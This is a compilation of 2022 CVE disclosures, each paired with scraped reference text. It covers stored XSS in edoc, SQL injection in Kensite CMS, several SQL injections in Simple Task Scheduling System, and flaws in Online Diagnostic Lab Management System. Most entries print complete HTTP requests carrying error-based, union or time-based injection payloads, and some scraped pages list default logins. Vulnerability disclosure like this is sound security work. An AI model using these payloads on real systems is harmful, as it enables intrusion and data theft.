Edoc-doctor-appointment-system v1.0.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability at /patient/settings.php. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name text field.

**edoc-echanneling**

Simple web project that made for e-channeling. This project helps a certain medical establishment such as a clinic or a hospital clients/patients to request an appointment with a doctor online. This project can also help doctors to manage the schedules of their appointments with their patients. This doctor's appointment system will organize the schedules of each patient's appointment, which will be submitted as a request to the doctor they have selected. The system has 3 sides which are the administrator, the doctor, and the patient. The system admin will populate the list of the doctors with their specialties and along with the doctor's details and system credentials. The patients will browse the doctor's appointment system website to find a doctor that has the specialty of their needs. The patient can check the doctor's weekly schedule to help them to choose the day and time which they can comply for the appointment and they will submit their request for an appointment. After that, the doctors can view all their appointments and the appointment request of the patients for their availability.

1.Admin

    Admin can add doctors,edit doctors, delete doctors;
    
    Schedule new doctors sessions,remove sessions;
    
    View patients details;
    
    View booking of patients;
    

2.Doctors

    View their Appointment;
    
    view their scheduled sessions;
    
    view details of patients;
    
    delete account;
    
    edit account settings;
    

3.Patiens(Clients)

    make appointment online;
    
    create accounts themslves;
    
    view their old booking;
    
    delete account;
    
    edit account settings;
    

If you are Admin,doctor or patient ,only have one page to login :)

**HOW TO GET STARTED**

Open your XAMPP Control Panel and start Apache and MySQL.

Extract the downloaded source code zip file.

Copy the extracted source code folder and paste it into the XAMPP's "htdocs" directory.

Browse the PHPMyAdmin in a browser. i.e. http://localhost/phpmyadmin

Create a new database naming edoc.

Import the provided SQL file. The file is known as DATABASE edoc.sql located inside the source code root folder.

Browse the Doctor's Appointment Systsem in a browser. i.e. http://localhost/edoc-echanneling-main/.

DATABASE NAME: 'edoc'

**BUILDIN USER ACCOUNTS OF THIS PROJECT**

ADMIN EMAIL: admin@edoc.com

ADMNIN PASSWORD: 123

DOCTOR EMAIL: doctor@edoc.com

DOCTOR PASSWORD: 123

PATIENT EMAIL: patient@edoc.com

PATIENT PASSWORD: 123

**The Project was developed using the following:**

Apache Version: 2.4.39

PHP Version: 7.3.5

Server Software: Apache/2.4.39 (Win64) PHP/7.3.5

MySQL Version: 5.7.26

Also available in sourcecodester.com : https://www.sourcecodester.com/hashenudara/simple-doctors-appointment-project.html

Demo video: https://youtu.be/mAWHYAHmit4

CVE-2022-36548: GitHub - HashenUdara/edoc-doctor-appointment-system: Simple web project that made for e-channeling.

Kensite CMS v1.0 was discovered to contain multiple SQL injection vulnerabilities via the name and oldname parameters at /framework/mod/db/DBMapper.xml.

Permalink

Cannot retrieve contributors at this time

#\[kensite\_cms\](https://github.com/seeyoui/kensite\_cms)：

#sql injection

The vulnerability was discovered by downloading the program's source code to local and online deployment tests.

Location:

src/main/resources/mapper/mysql/framework/mod/db/DBMapper.xml

Code：

Found that the mapper file 'name' ’oldName‘parameter is not precompiled

\`\`\`

<update id="renameTable" parameterType="com.seeyoui.kensite.framework.mod.table.domain.Table">

rename ${oldName} to ${name}

</update>

\`\`\`

src/main/java/com/seeyoui/kensite/framework/mod/table/service/TableService.java call dbMapper.renameTable(table);

\`\`\`

public void update(Table table) throws CRUDException{

Table tableOld = tableMapper.findOne(table.getId());

table.preUpdate();

tableMapper.update(table);

if(table.getName()!=null && !table.getName().equals(tableOld.getName())) {

table.setOldName(tableOld.getName());

dbMapper.renameTable(table);

tableMapper.updateFk(table);

TableColumn tableColumn = new TableColumn();

tableColumn.setOldTableName(tableOld.getName());

tableColumn.setTableName(table.getName());

tableColumnMapper.rename(tableColumn);

}

if(table.getComments()!=null && !table.getComments().equals(tableOld.getComments())) {

dbMapper.commentTable(table);

}

}

\`\`\`

update Interface called tableService.update(table); The table parameter contains name.

\`\`\`

//@RequiresPermissions("sys:table:update")

@RequestMapping(value = "/update", method=RequestMethod.POST)

@ResponseBody

public String update(HttpSession session,

HttpServletResponse response, HttpServletRequest request,

ModelMap modelMap, Table table) throws Exception{

if (!beanValidator(modelMap, table)){

RequestResponseUtil.putResponseStr(session, response, request, modelMap, StringConstant.FALSE);

return null;

}

tableService.update(table);

RequestResponseUtil.putResponseStr(session, response, request, modelMap, StringConstant.TRUE);

return null;

}

\`\`\`

\`\`\`

public class Table extends DataEntity<Table> {

private static final long serialVersionUID = 5454155825314635342L;

private String name;

private String oldName;

private String comments;

private String parentTable;

private String parentTableFk;

private String category;

\`\`\`

Harm：

The attacker only needs an ordinary user to trigger the vulnerability and use the SQL injection vulnerability to obtain database information.

Conditions for Execution：

Ordinary users can log in to the background and call sys/table/update to inject SQL..

Edition：

Version = all

Cause the cause ：

Use the splicing method to splice the parameter'"+name+"' '"+oldname+"' in the sql query statement, and then bring the sql statement into the database for execution, and the vulnerability is triggered.

CVE-2022-36529: xdon/kensite_cms at main · xdon9/xdon

Simple Task Scheduling System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /classes/Master.php?f=delete_category.

Permalink

Cannot retrieve contributors at this time

**Simple Task Scheduling System v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/15328/simple-task-scheduler-system-phpoop-free-source-code.html

The program is built using the xmapp-php5.6 version

Vulnerability File: /tss/classes/Master.php?f=delete\_category

Vulnerability location: /tss/classes/Master.php?f=delete\_category, id

db\_name = tss\_db;length=6

\[+\] Payload: id=3' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /tss/classes/Master.php?f\=delete\_category HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: \_ga=GA1.1.1382961971.1655097107; PHPSESSID=tc6akb10bh652defck09t9eug4
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 67
id=3' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-36678: bug_report/SQLi-2.md at main · k0xx11/bug_report

Simple Task Scheduling System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /admin/?page=user/manage_user.

**Simple Task Scheduling System v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/15328/simple-task-scheduler-system-phpoop-free-source-code.html

The program is built using the xmapp-php5.6 version

Vulnerability File: /tss/admin/?page=user/manage\_user&id=

Vulnerability location: /tss/admin/?page=user/manage\_user&id=, id

db\_name = tss\_db;length=6

\[+\] Payload: /tss/admin/?page=user/manage\_user&id=-7%27%20union%20select%201,database(),3,4,5,6,7,8,9,10,11--+ // Leak place ---> id

GET /tss/admin/?page\=user/manage\_user&id\=\-7%27%20union%20select%201,database(),3,4,5,6,7,8,9,10,11\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: \_ga=GA1.1.1382961971.1655097107; PHPSESSID=tc6akb10bh652defck09t9eug4
Connection: close

CVE-2022-36679: bug_report/SQLi-1.md at main · k0xx11/bug_report

There is an unauthorized access vulnerability in Online Diagnostic Lab Management System 1.0.

Submitted by oretnom23 on Wednesday, January 12, 2022 - 09:38.

****Introduction****

This is a simple **PHP Mini-Project** entitled **Online Diagnostic Lab Management System**. This is a web-based application that serves as an online platform for diagnostic labs to manage their patient Laboratory test. The system also allows clients/patients to book an appointment. This simple project can help the said medical lab testing manage the records of the appointment and test result records of their patient. The clients/patients can register their system credentials so to book an appointment and explore the updates about his here diagnostic testing. It has a pleasant user interface and user-friendly functionalities.

****About the Online Diagnostic Lab Management System****

I developed this project using the following:

*   **XAMPP v3.3.0** as my local webserver that has a **PHP Version 8.0.7**
*   **PHP Language**
*   **MySQL Database**
*   **HTML**
*   **CSS**
*   **JavaScript**
*   **jQuery**
*   **Ajax**
*   **Bootstrap**
*   **AdminLTE**
*   and more...

This **Online Diagnostic Lab Management System** has an **Admin Panel** where the Lab's management can update the records, upload the patient's lab testing results. This side of the system requires an **admin** or **staff** user credential in order to access the features and functionalities. The patients can register their accounts easily and book a lab testing appointment on their side. They can list all of their appointment records with the diagnostic lab and also they can check the updated status of their results and download their lab test results.

****Features********Admin Panel****

*   **Secure Login and Logout**
*   **Dashboard**
    *   Display the summary of lists.
*   **Test List Management**
    *   Add New Test
    *   List All Tests
    *   View Test Details
    *   Update Test Details
    *   Delete Test Details
*   **Appointment Management**
    *   List All Appointment
    *   View Appointment Details
    *   List Appointment's Test Details
    *   List Appointment's Update History Details
    *   Update Appointment's Status
    *   Upload test Result/Report
    *   Download Prescription
    *   Download Test Result
    *   Delete Appointment/Test Records
*   **Registered User List Management**
    *   List All Registered User
    *   View Registered User Details
    *   Delete Registered User Details
*   **Manage User List (CRUD)**
*   **Manage Account Details/Credentials**
*   **Manage System Information**

****User-Side****

*   **Secure Login and Registration**
*   **Appointment Management**
    *   Booked an Appointment
    *   List All Appointment
    *   View Appointment Details
    *   List Appointment's Test Details
    *   List Appointment's Update History Details
    *   Cancel Booked Appointment
    *   Download Prescription
    *   Download Test Result
    *   Delete Appointment/Test Records
*   **List All Test Result**
*   **Download Test Result**
*   **Manage Account Details/Credentials**
*   **Logout**

**System Snapshots of some Features****Dashboard _(User-Side)_**

**Appointment Details _(User-Side)_**

**Test Result List Page _(User-Side)_**

**Admin Dashboard _(Admin-Side)_**

**Booked Appointment List _(Admin-Side)_**

**How to Run ??**

****Requirements****

*   **Download** and **Install** any **local web server** such as **XAMPP/WAMP.**
*   **Download** the provided source code **zip** file. (_download button is located below_)

****Installation/Setup****

1.  Enable the **GDLibrary** in your php.ini file.
2.  **Open** your **XAMPP/WAMP's Control Panel** and start ****Apache**** and ****MySQL****.
3.  **Extract** the **downloaded source code **zip** file**.
4.  If you are using **XAMPP**, **copy** the extracted source code folder and **paste** it into the **XAMPP's "htdocs" directory**. And If you are using **WAMP**, **paste** it into the **"www" directory.**
5.  **Browse** the ****PHPMyAdmin**** in a **browser**. i.e. ****http://localhost/phpmyadmin****
6.  **Create** a **new database** naming ****odlms\_db****.
7.  **Import** the provided ****SQL**** file. The file is known as ****odlms\_db.sql**** located inside the **database** folder.
8.  **Browse** the **Online Diagnostic Lab Management System** in a **browser**. i.e. ****http://localhost/odlms/**** for the user side and ****http://localhost/odlms/admin**** for the admin side.

**Default Admin Access**

**Username:** admin  
**Password:** admin123

**Sample User Access**

**Email:** \[email protected\]  
**Password:** cblake123

**DEMO VIDEO**

That's it. You can now explore the features and functionalities of this **Online Diagnostic Lab Management System** in **PHP**. I hope this project will help you with what you are looking for and you'll find something useful for your future projects.

Explore more on this website for more **Free Source Codes** and **Tutorials**.

**Enjoy :)**

*   9264 views

CVE-2022-37151: Online Diagnostic Lab Management System in PHP with Free Source Code

Simple Task Scheduling System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /classes/Master.php?f=delete_student.

**Simple Task Scheduling System v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/15328/simple-task-scheduler-system-phpoop-free-source-code.html

The program is built using the xmapp-php5.6 version

Vulnerability File: /tss/classes/Master.php?f=delete\_student

Vulnerability location: /tss/classes/Master.php?f=delete\_student, id

You need to first create the library by executing the following sql statement in the database tss\_db

CREATE TABLE \`student\_list\` ( 
  \`id\` int(30) NOT NULL,
  \`user\_id\` int(30) NOT NULL,
  \`name\` text NOT NULL,
  \`status\` tinyint(1) NOT NULL DEFAULT '1',
  \`delete\_flag\` tinyint(1) NOT NULL DEFAULT '0',
  \`date\_created\` datetime NOT NULL DEFAULT CURRENT\_TIMESTAMP,
  \`date\_updated\` datetime NOT NULL DEFAULT CURRENT\_TIMESTAMP ON UPDATE CURRENT\_TIMESTAMP
) ENGINE\=InnoDB DEFAULT CHARSET\=utf8mb4;

db\_name = tss\_db;length=6

\[+\] Payload: id=3' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /tss/classes/Master.php?f\=delete\_student HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: \_ga=GA1.1.1382961971.1655097107; PHPSESSID=tc6akb10bh652defck09t9eug4
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 67
id=3' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-36682: bug_report/SQLi-4.md at main · k0xx11/bug_report

Simple Task Scheduling System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /classes/Master.php?f=delete_account.

**Simple Task Scheduling System v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/15328/simple-task-scheduler-system-phpoop-free-source-code.html

The program is built using the xmapp-php5.6 version

Vulnerability File: /tss/classes/Master.php?f=delete\_account

Vulnerability location: /tss/classes/Master.php?f=delete\_account, id

You need to first create the library by executing the following sql statement in the database tss\_db

CREATE TABLE \`accounts\` ( 
  \`id\` int(30) NOT NULL,
  \`user\_id\` int(30) NOT NULL,
  \`name\` text NOT NULL,
  \`status\` tinyint(1) NOT NULL DEFAULT '1',
  \`delete\_flag\` tinyint(1) NOT NULL DEFAULT '0',
  \`date\_created\` datetime NOT NULL DEFAULT CURRENT\_TIMESTAMP,
  \`date\_updated\` datetime NOT NULL DEFAULT CURRENT\_TIMESTAMP ON UPDATE CURRENT\_TIMESTAMP
) ENGINE\=InnoDB DEFAULT CHARSET\=utf8mb4;

db\_name = tss\_db;length=6

\[+\] Payload: id=3' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /tss/classes/Master.php?f\=delete\_account HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: \_ga=GA1.1.1382961971.1655097107; PHPSESSID=tc6akb10bh652defck09t9eug4
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 67
id=3' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-36681: bug_report/SQLi-5.md at main · k0xx11/bug_report

Simple Task Scheduling System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /classes/Master.php?f=delete_payment.

**Simple Task Scheduling System v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/15328/simple-task-scheduler-system-phpoop-free-source-code.html

The program is built using the xmapp-php5.6 version

Vulnerability File: /tss/classes/Master.php?f=delete\_payment

Vulnerability location: /tss/classes/Master.php?f=delete\_payment, id

You need to first create the library by executing the following sql statement in the database tss\_db

CREATE TABLE \`payment\_list\` ( 
  \`id\` int(30) NOT NULL,
  \`user\_id\` int(30) NOT NULL,
  \`name\` text NOT NULL,
  \`status\` tinyint(1) NOT NULL DEFAULT '1',
  \`delete\_flag\` tinyint(1) NOT NULL DEFAULT '0',
  \`date\_created\` datetime NOT NULL DEFAULT CURRENT\_TIMESTAMP,
  \`date\_updated\` datetime NOT NULL DEFAULT CURRENT\_TIMESTAMP ON UPDATE CURRENT\_TIMESTAMP
) ENGINE\=InnoDB DEFAULT CHARSET\=utf8mb4;

db\_name = tss\_db;length=6

\[+\] Payload: id=3' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /tss/classes/Master.php?f\=delete\_payment HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: \_ga=GA1.1.1382961971.1655097107; PHPSESSID=tc6akb10bh652defck09t9eug4
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 67
id=3' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-36683: bug_report/SQLi-6.md at main · k0xx11/bug_report

Simple Task Scheduling System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /classes/Master.php?f=delete_schedule.

Permalink

Cannot retrieve contributors at this time

**Simple Task Scheduling System v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/15328/simple-task-scheduler-system-phpoop-free-source-code.html

The program is built using the xmapp-php5.6 version

Vulnerability File: /tss/classes/Master.php?f=delete\_schedule

Vulnerability location: /tss/classes/Master.php?f=delete\_schedule, id

db\_name = tss\_db;length=6

\[+\] Payload: id=3' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /tss/classes/Master.php?f\=delete\_schedule HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: \_ga=GA1.1.1382961971.1655097107; PHPSESSID=tc6akb10bh652defck09t9eug4
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 67
id=3' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-36680: bug_report/SQLi-3.md at main · k0xx11/bug_report

An issue was discovered in Online Diagnostic Lab Management System 1.0, There is a SQL injection vulnerability via "dob" parameter in "/classes/Users.php?f=save_client"

**CVE-2022-37152**

An SQL injection was discovered inOnline Diagnostic Lab Management System

Vul name: SQL Injection of OLDMS

Affected Product: Online Diagnostic Lab Management System v1.0

Affected or fixed version(s): At present, the manufacturer has not released an upgrade patch to fix this security problem

Vul Type:SQL Injection

Impact: A SQL injection vulnerability was find in OLDMS, it could be used to get database information by unauthorized attackers

vul page: /odlms/classes/Users.php?f=save\_client

payload: POST /odlms/classes/Users.php?f=save\_client HTTP/1.1 Content-Disposition: form-data; name="dob" 2022-07-19'+(SELECT 0x4F4C7572 WHERE 1915=1915 AND (SELECT 1784 FROM (SELECT(SLEEP(5)))HMuY))+'

Source Code: https://www.sourcecodester.com/php/15129/online-diagnostic-lab-management-system-php-free-source-code.html

Tag

#sql